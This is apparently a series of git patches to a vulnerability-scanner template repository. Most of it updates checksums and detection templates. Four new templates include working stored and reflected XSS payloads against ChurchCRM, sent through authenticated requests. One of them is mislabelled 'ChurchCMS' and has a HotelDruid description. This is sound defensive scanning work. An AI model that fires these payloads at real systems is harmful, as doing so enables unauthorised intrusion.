+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
http/technologies/wordpress-detect.yaml:fcd6c47e6ae72e3d87671b6cd0b892a0879adfec
http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -6445,7 +6446,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
-templates-checksum.txt:8bfdd32b4006470cdc07cc40eb0b66d2c8a719e4
+templates-checksum.txt:5e977cd0cc112beb09671f8102a0874d3907fa46
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 4bbbdc14e276c86983bfd911f60c6c35c9613a5d Mon Sep 17 00:00:00 2001
From: Ritik Chaddha
Date: Sat, 24 Jun 2023 23:58:07 +0530
Subject: [PATCH 529/670] Revert "Create grav-register-admin.yaml"
This reverts commit e406a9a8300df667bd011100d27ffe8423f80481.
---
.../misconfiguration/grav-register-admin.yaml | 29 -------------------
1 file changed, 29 deletions(-)
delete mode 100644 http/misconfiguration/grav-register-admin.yaml
diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml
deleted file mode 100644
index 77daa8f616..0000000000
--- a/http/misconfiguration/grav-register-admin.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: grav-register-admin
-
-info:
- name: Grav Register Admin User - Detect
- author: DhiyaneshDk
- severity: high
- metadata:
- max-request: 1
- verified: true
- shodan-query: title:"Grav Register Admin User"
- tags: misconfig,grav,register,admin,exposure
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/admin"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'Grav Register Admin User | Grav'
- - 'admin accounts'
- condition: and
-
- - type: status
- status:
- - 200
From da6628e6085c20f1fc79b459723f75b54a0deb4d Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 24 Jun 2023 18:28:32 +0000
Subject: [PATCH 530/670] Auto Generated New Template Addition List [Sat Jun 24
18:28:32 UTC 2023] :robot:
---
.new-additions | 1 -
1 file changed, 1 deletion(-)
diff --git a/.new-additions b/.new-additions
index 2693209156..82f3228a16 100644
--- a/.new-additions
+++ b/.new-additions
@@ -10,5 +10,4 @@ http/exposed-panels/axxon-client-panel.yaml
http/exposed-panels/syncserver-panel.yaml
http/exposures/configs/aws-config.yaml
http/exposures/configs/aws-credentials.yaml
-http/misconfiguration/grav-register-admin.yaml
http/misconfiguration/odoo-unprotected-database.yaml
From 1d2c8776a8ef208a054a7bef5dc41685006962d5 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 24 Jun 2023 18:28:46 +0000
Subject: [PATCH 531/670] Auto Generated Templates Checksum [Sat Jun 24
18:28:46 UTC 2023] :robot:
---
templates-checksum.txt | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 4b21a2b60c..f4c08f2041 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -3938,7 +3938,6 @@ http/misconfiguration/graphql/graphql-array-batching.yaml:f8195b045be9e30fa9215b
http/misconfiguration/graphql/graphql-field-suggestion.yaml:774a6f99933e22ea8e3c0a6987748d32162d71db
http/misconfiguration/graphql/graphql-get-method.yaml:b2f6cd219ca2117a2fab9a9145c488b89a600acf
http/misconfiguration/graphql/graphql-playground.yaml:791736c821562ea09fef7b49bd146de709c47ec1
-http/misconfiguration/grav-register-admin.yaml:f80f0d8b6991916ed793dd28151f9e65fd16b310
http/misconfiguration/hadoop-unauth-rce.yaml:3d39991821296cf7d1aba075286ee111f25991b2
http/misconfiguration/haproxy-exporter-metrics.yaml:bed30cee7f8cfa31c5896170da6c1c55dc64ae2e
http/misconfiguration/haproxy-status.yaml:e64b16ad4d2303dccf83416862651941caeaea72
@@ -6446,7 +6445,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
-templates-checksum.txt:5e977cd0cc112beb09671f8102a0874d3907fa46
+templates-checksum.txt:04685e36d83ed6325fbe9345e2ff36f7fdb6c119
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From a0d9c747f426a36e5416802ea3b287bc10b14e3d Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sat, 24 Jun 2023 23:59:15 +0530
Subject: [PATCH 532/670] Create grav-register-admin.yaml
---
.../misconfiguration/grav-register-admin.yaml | 29 +++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 http/misconfiguration/grav-register-admin.yaml
diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml
new file mode 100644
index 0000000000..92f9f5007b
--- /dev/null
+++ b/http/misconfiguration/grav-register-admin.yaml
@@ -0,0 +1,29 @@
+id: grav-register-admin
+
+info:
+ name: Grav Register Admin User - Detect
+ author: DhiyaneshDk
+ severity: high
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: title:"Grav Register Admin User"
+ tags: grav,register,admin
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admin"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Grav Register Admin User | Grav'
+ - 'admin accounts'
+ condition: and
+
+ - type: status
+ status:
+ - 200
From d4a2b2d514a8187f56ed523bc24440ecb101d213 Mon Sep 17 00:00:00 2001
From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com>
Date: Sun, 25 Jun 2023 00:44:38 +0530
Subject: [PATCH 533/670] Create CVE-2023-25346.yaml
---
http/cves/2023/CVE-2023-25346.yaml | 41 ++++++++++++++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-25346.yaml
diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml
new file mode 100644
index 0000000000..a62311693d
--- /dev/null
+++ b/http/cves/2023/CVE-2023-25346.yaml
@@ -0,0 +1,41 @@
+id: CVE-2023-25346
+
+info:
+ name: ChurchCMS - Reflected XSS
+ author: Harsh
+ severity: medium
+ description: |
+ A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.
+ reference:
+ - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-25346
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-25346
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,churchCMS,reflected,xss,auth
+
+http:
+ - raw:
+ - |
+ POST /churchcrm/session/begin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ User={{username}}&Password={{password}}
+
+ - |
+ GET /churchcrm/v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "")'
+ - 'contains(body_2, "ChurchCRM")'
+ condition: and
From dad8a4d86ce9cf88a655cc05f05d2f7a7c0c294c Mon Sep 17 00:00:00 2001
From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com>
Date: Sun, 25 Jun 2023 01:32:26 +0530
Subject: [PATCH 534/670] Create CVE-2023-26842.yaml
---
http/cves/2023/CVE-2023-26842.yaml | 52 ++++++++++++++++++++++++++++++
1 file changed, 52 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-26842.yaml
diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml
new file mode 100644
index 0000000000..de53597b39
--- /dev/null
+++ b/http/cves/2023/CVE-2023-26842.yaml
@@ -0,0 +1,52 @@
+id: CVE-2023-26842
+
+info:
+ name: ChurchCRM - Stored Cross Site Scripting
+ author: Harsh
+ severity: medium
+ description: |
+ A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.
+ reference:
+ - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26842
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-26842
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2023-26842
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,churchCRM,stored,xss,authenticated
+http:
+ - raw:
+ - |
+ POST /churchcrm/session/begin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ User={{username}}&Password={{password}}
+
+ - |
+ POST /churchcrm//OptionManager.php?mode=classes&ListID=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ 1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=" onfocus=alert(document.domain) autofocus="&AddField=Add+New+Person+Classification
+
+ cookie-reuse: true
+ redirects: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "onfocus=alert(document.domain) autofocus=")'
+ - 'contains(body_2, "ChurchCRM")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
+ internal: true
From 2fd0eb8145188e5cbb5f169392665f7eb2661fbb Mon Sep 17 00:00:00 2001
From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com>
Date: Sun, 25 Jun 2023 01:51:22 +0530
Subject: [PATCH 535/670] Create CVE-2023-26843.yaml
---
http/cves/2023/CVE-2023-26843.yaml | 44 ++++++++++++++++++++++++++++++
1 file changed, 44 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-26843.yaml
diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml
new file mode 100644
index 0000000000..bd1fb45f8e
--- /dev/null
+++ b/http/cves/2023/CVE-2023-26843.yaml
@@ -0,0 +1,44 @@
+id: CVE-2023-26843
+
+info:
+ name: ChurchCRM - Stored Cross Site Scripting
+ author: Harsh
+ severity: medium
+ description: |
+ A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.
+ reference:
+ - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26843
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-26843
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2023-26843
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,churchCRM,stored,xss,authenticated
+http:
+ - raw:
+ - |
+ POST /churchcrm/session/begin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ User={{username}}&Password={{password}}
+
+ - |
+ POST /churchcrm/NoteEditor.php?FamilyID=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ PersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save
+
+ cookie-reuse: true
+ redirects: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(body_2, ">")'
+ - 'contains(body_2, "ChurchCRM")'
+ condition: and
From 2cc6c7d99ff4a9478ccf3c803a6cfd0ede018199 Mon Sep 17 00:00:00 2001
From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com>
Date: Sun, 25 Jun 2023 02:10:57 +0530
Subject: [PATCH 536/670] Create CVE-2023-31548.yaml
---
http/cves/2023/CVE-2023-31548.yaml | 44 ++++++++++++++++++++++++++++++
1 file changed, 44 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-31548.yaml
diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml
new file mode 100644
index 0000000000..ae67b5167d
--- /dev/null
+++ b/http/cves/2023/CVE-2023-31548.yaml
@@ -0,0 +1,44 @@
+id: CVE-2023-31548
+
+info:
+ name: ChurchCRM - Stored Cross Site Scripting
+ author: Harsh
+ severity: medium
+ description: |
+ A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
+ reference:
+ - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-31548
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-31548
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2023-31548
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,churchCRM,stored,xss,authenticated
+http:
+ - raw:
+ - |
+ POST /churchcrm/session/begin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ User={{username}}&Password={{password}}
+
+ - |
+ POST /churchcrm/FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ FundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test
+
+ cookie-reuse: true
+ redirects: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "alert(document.domain)")'
+ - 'contains(body_2, "ChurchCRM")'
+ condition: and
From 1b47ea7c3f48066cd2b77c64e3c1351a56be42d3 Mon Sep 17 00:00:00 2001
From: Adam Crosser <45573557+AdamCrosser@users.noreply.github.com>
Date: Sat, 24 Jun 2023 17:25:54 -0500
Subject: [PATCH 537/670] Update Nuclei Detection Templates for National
Vulnerability Database Correlation (#7490)
* Update Confluence Version
* Added Application Category
* Updated Grafana Template
* Updated WordPress Template
* Update grafana-detect.yaml
* Update jenkins-detect.yaml
* Update Jira Detection Template
* Update Tomcat Template
* Update Atlassian Crowd Template
* misc update
* workflow fix
---------
Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
---
http/exposed-panels/atlassian-crowd-panel.yaml | 13 +++++++++++--
http/exposed-panels/grafana-detect.yaml | 16 ++++++++++++----
http/technologies/apache/tomcat-detect.yaml | 5 ++++-
http/technologies/jenkins-detect.yaml | 12 ++++++++++--
.../jira-detect.yaml | 11 ++++++-----
http/technologies/wordpress-detect.yaml | 5 ++++-
workflows/jira-workflow.yaml | 2 +-
7 files changed, 48 insertions(+), 16 deletions(-)
rename http/{exposed-panels => technologies}/jira-detect.yaml (80%)
diff --git a/http/exposed-panels/atlassian-crowd-panel.yaml b/http/exposed-panels/atlassian-crowd-panel.yaml
index 9ff7221536..10eeb1b28d 100644
--- a/http/exposed-panels/atlassian-crowd-panel.yaml
+++ b/http/exposed-panels/atlassian-crowd-panel.yaml
@@ -2,7 +2,7 @@ id: atlassian-crowd-panel
info:
name: Atlassian Crowd Login Panel
- author: organiccrap
+ author: organiccrap,AdamCrosser
severity: info
description: An Atlassian Crowd login panel was discovered.
reference:
@@ -12,6 +12,9 @@ info:
tags: panel,atlassian
metadata:
max-request: 1
+ vendor: atlassian
+ product: crowd
+ category: sso
http:
- method: GET
@@ -24,4 +27,10 @@ http:
- Atlassian Crowd - Login
part: body
-# Enhanced by mp on 2022/03/20
+ extractors:
+ - type: regex
+ name: version
+ group: 1
+ regex:
+ - 'value="Version: ([\d.]+)'
+ part: body
diff --git a/http/exposed-panels/grafana-detect.yaml b/http/exposed-panels/grafana-detect.yaml
index 8aa2c08ff4..488fdd1555 100644
--- a/http/exposed-panels/grafana-detect.yaml
+++ b/http/exposed-panels/grafana-detect.yaml
@@ -2,7 +2,7 @@ id: grafana-detect
info:
name: Grafana Login Panel - Detect
- author: organiccrap
+ author: organiccrap,AdamCrosser
severity: info
description: Grafana login panel was detected.
classification:
@@ -12,22 +12,30 @@ info:
metadata:
max-request: 1
shodan-query: title:"Grafana"
- tags: panel,grafana
+ vendor: grafana
+ product: grafana
+ category: devops
+ tags: panel,grafana,detect
http:
- method: GET
path:
- "{{BaseURL}}/login"
+
matchers:
- type: word
+ part: body
words:
- "Grafana"
- part: body
+
extractors:
- type: regex
+ name: version
part: body
group: 1
regex:
- '\"version\"\:\"([0-9.]+)\"}'
-# Enhanced by md on 2022/11/16
+ - type: kval
+ kval:
+ - version
diff --git a/http/technologies/apache/tomcat-detect.yaml b/http/technologies/apache/tomcat-detect.yaml
index f447e2c415..8ba2822eb9 100644
--- a/http/technologies/apache/tomcat-detect.yaml
+++ b/http/technologies/apache/tomcat-detect.yaml
@@ -2,12 +2,14 @@ id: tomcat-detect
info:
name: Tomcat Detection
- author: philippedelteil,dhiyaneshDk
+ author: philippedelteil,dhiyaneshDk,AdamCrosser
severity: info
description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.
metadata:
max-request: 3
shodan-query: title:"Apache Tomcat"
+ vendor: apache
+ product: tomcat
tags: tech,tomcat,apache
http:
@@ -33,6 +35,7 @@ http:
extractors:
- type: regex
+ name: version
group: 1
regex:
- '(?i)Apache Tomcat.*([0-9]\.[0-9]+\.[0-9]+)'
diff --git a/http/technologies/jenkins-detect.yaml b/http/technologies/jenkins-detect.yaml
index 2f795da533..6832efe6c1 100644
--- a/http/technologies/jenkins-detect.yaml
+++ b/http/technologies/jenkins-detect.yaml
@@ -2,7 +2,7 @@ id: jenkins-detect
info:
name: Jenkins Detection
- author: philippdelteil,daffainfo,c-sh0
+ author: philippdelteil,daffainfo,c-sh0,AdamCrosser
severity: info
reference:
- https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-DetectingJenkinsversion
@@ -11,7 +11,10 @@ info:
metadata:
max-request: 2
shodan-query: http.favicon.hash:81586312
- tags: tech,jenkins
+ vendor: jenkins
+ product: jenkins
+ category: devops
+ tags: tech,jenkins,detect
http:
- method: GET
@@ -36,5 +39,10 @@ http:
extractors:
- type: kval
+ name: version
kval:
- x_jenkins
+
+ - type: kval
+ kval:
+ - version
diff --git a/http/exposed-panels/jira-detect.yaml b/http/technologies/jira-detect.yaml
similarity index 80%
rename from http/exposed-panels/jira-detect.yaml
rename to http/technologies/jira-detect.yaml
index f107baaf14..38b430bbc7 100644
--- a/http/exposed-panels/jira-detect.yaml
+++ b/http/technologies/jira-detect.yaml
@@ -1,17 +1,20 @@
id: jira-detect
info:
- name: Jira Login Panel - Detect
- author: pdteam,philippedelteil
+ name: Jira Detect
+ author: pdteam,philippedelteil,AdamCrosser
severity: info
description: Jira login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
- tags: panel,jira
+ tags: tech,panel,jira,atlassian
metadata:
max-request: 3
+ vendor: atlassian
+ product: jira
+ category: productivity
http:
- method: GET
@@ -34,5 +37,3 @@ http:
group: 1
regex:
- 'title="JiraVersion" value="([0-9.]+)'
-
-# Enhanced by md on 2022/11/21
diff --git a/http/technologies/wordpress-detect.yaml b/http/technologies/wordpress-detect.yaml
index 7e0d692b9b..8f881fac5c 100644
--- a/http/technologies/wordpress-detect.yaml
+++ b/http/technologies/wordpress-detect.yaml
@@ -2,12 +2,15 @@ id: wordpress-detect
info:
name: WordPress Detect
- author: pdteam,daffainfo,ricardomaia,topscoder
+ author: pdteam,daffainfo,ricardomaia,topscoder,AdamCrosser
severity: info
metadata:
max-request: 4
verified: true
shodan-query: http.component:"WordPress"
+ vendor: wordpress
+ product: wordpress
+ category: cms
tags: tech,wordpress,cms,wp
http:
diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml
index 1d7db71f7f..5e184dcfcd 100644
--- a/workflows/jira-workflow.yaml
+++ b/workflows/jira-workflow.yaml
@@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all Jira related nuclei templates on a given target.
workflows:
- - template: http/exposed-panels/jira-detect.yaml
+ - template: http/technologies/jira-detect.yaml
subtemplates:
- tags: jira
\ No newline at end of file
From 155269ce5f30c1742a5a19d50b5c452a5dbbb119 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 24 Jun 2023 22:26:30 +0000
Subject: [PATCH 539/670] Auto Generated Templates Checksum [Sat Jun 24
22:26:30 UTC 2023] :robot:
---
templates-checksum.txt | 16 ++++++++--------
1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index f4c08f2041..20ebcaad5c 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2471,7 +2471,7 @@ http/exposed-panels/aspect-control-panel.yaml:4ef7859a7c920aac6f57066695c31a21f1
